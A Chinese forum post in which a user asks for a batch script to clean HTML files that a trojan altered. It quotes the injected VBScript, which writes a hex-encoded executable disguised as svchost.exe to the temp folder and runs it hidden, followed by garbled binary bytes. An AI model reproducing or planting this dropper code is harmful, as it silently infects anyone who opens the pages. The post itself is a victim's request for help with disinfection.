本帖最后由 pcl_test 于 2017-1-9 10:10 编辑
电脑中了木码,导致硬盘上面所有以*.html和*.htm文件结尾的文件,在文件</html>标签之后被加上了一段代码,代码具体内容见附件,我已单独保存出来了。现在就想通过一个批处理命令来把所有被篡改的文件改回来,这些被感染文件都是需要的,不能被删除,- <html>
- <head>
- </head>
- <body>
- ……
- </body>
- </html>
- <SCRIPT Language=VBScript><!--
- DropFileName = "svchost.exe"
- WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B9638…………73672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000000000000000000000000000000000000000000000000000000"
- Set FSO = CreateObject("Scripting.FileSystemObject")
- DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
- If FSO.FileExists(DropPath)=False Then
- Set FileObj = FSO.CreateTextFile(DropPath, True)
- For i = 1 To Len(WriteData) Step 2
- FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
- Next
- FileObj.Close
- End If
- Set WSHshell = CreateObject("WScript.Shell")
- WSHshell.Run DropPath, 0
- //--></SCRIPT><!--??懔?図妽譨_9鯥歍x<+5皈┵sPq"古啭e"黳y6еR跤郙傩?啢?c皥昆y??瓗-k-?啍跪o玽9䅟V鑰芮.道Q趌幼d~?sk"扷X紃憴?A鈂檷炶?浏 撍M}瓖_砢~岭_'椬?V??栜T'?; ki(1w?Jm牯廫\|+r劗穌纏?2騉M≥]@瘜b
- NWA%菐%j毐N?/蹧?蕆3縁
复制代码
|